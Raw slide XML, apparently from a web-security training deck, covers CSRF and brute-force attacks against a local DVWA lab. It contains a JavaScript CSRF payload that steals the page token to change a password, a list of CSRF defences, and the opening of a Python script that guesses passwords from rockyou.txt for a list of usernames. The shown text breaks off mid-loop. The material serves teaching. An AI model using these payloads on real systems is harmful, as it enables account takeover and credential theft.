                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> var token = doc.getElementsByName("user_token")[0].value;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>const http = new XMLHttpRequest();</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> const url = "http://localhost/DVWA/vulnerabilities/csrf/?password_new='password'&amp;password_conf='password'&amp;Change=Change&amp;user_token="+token+"#";</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> http.open("GET", url);</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> http.send();</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="61111"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> console.log("password changed");</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 &lt;/script&gt;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 &lt;/body&gt;</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>&lt;/html&gt;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CSRF</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="499" name="Google Shape;499;p7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REST</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-334327" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Anti-Forgery Tokens</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-334327" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Ensure Cookies are sent with the SameSite Cookie Attribute</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-334327" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Include Addition Authentication for Sensitive Actions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Make sure that the user must enter something they know if they are going to change something on their account. For example, if you want to change your password, you must be required to give you current password and new password. This protects the change password page from CSRF attacks because the attacker must know the current password for the password to be changed.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Generate and assign unique, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>random</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> and strong CSRF tokens each </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>time</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> a user needs to submit information on any page.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Brute Force</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="505" name="Google Shape;505;p7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Brute force attacks are when an attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>checks all possible combinations until the correct combination is found. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>When attackers attempt to guess a password they will user a combination of dictionary attacks and common password lists. They will try to get as many clues on their targets’ password as possible so they can have the best chance at guessing their password.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Hackers would mainly get a list of available usernames and then try a list of passwords and go through each username for that password until they find a correct combination. They can get a list of usernames through user enumeration or publicly accessible information.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Brute force attacks can also be used to perform denial of service attacks.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concepts to brute force</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="511" name="Google Shape;511;p8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Dictionary attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Password lists</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Denial of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> attacks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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="16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Brute Force /DVWA/login.php User Credentials</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="517" name="Google Shape;517;p81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="651900"/>
            <a:ext cx="4260300" cy="41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t>import requests</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>import time</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def newSession():</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>    s = requests.Session()</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>    r = s.get('http://localhost/DVWA/login.php')</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>    # getting the required cookies</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>    headers = r.headers["Set-Cookie"].split(" ")</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>    cookies = []</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>    keywords = ["security", "PHPSESSID"]</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>    for i in headers:</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>        for j in range(len(keywords)):</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>            if keywords[j] in i:</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>                cookies.append(i)</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    _cookies = {}</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>    for i in cookies:</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>        out = i.split("=")</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>        key = out[0]</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>        value = out[1].replace(";","")</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>        _cookies[key] = value</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>    </a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>    return s, r</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s, r = newSession()</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def getToken(r):</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>    content = r.content.decode()</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>    cut = content.split("user_token")[1]</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>    return cut.split("'")[2]</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with open("usernames.txt", "r") as f:</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>    _user = f.read().splitlines() # creates a list of usernames from a file.</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number_of_usernames = len(_user)</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invalid_msg = "Login failed"</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t># opens a password file to iterate through</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>password_file = open("/usr/share/wordlists/rockyou.txt", "r")</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>list_of_found = []</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>found_credentials = []</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None/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="518" name="Google Shape;518;p81"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3105050" y="651900"/>
            <a:ext cx="4717200" cy="3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600"/>
              <a:t>password = password_file.readline()</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>print("Searching for credentials...")</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t># print("Found:")</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>n = 0</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try:</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>    while password:</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>        n+=1</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>        for username in _user:</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
              <a:t>            if username in list_of_found:</a:t>
            </a:r>
            <a:endParaRPr sz="600"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="600"/>
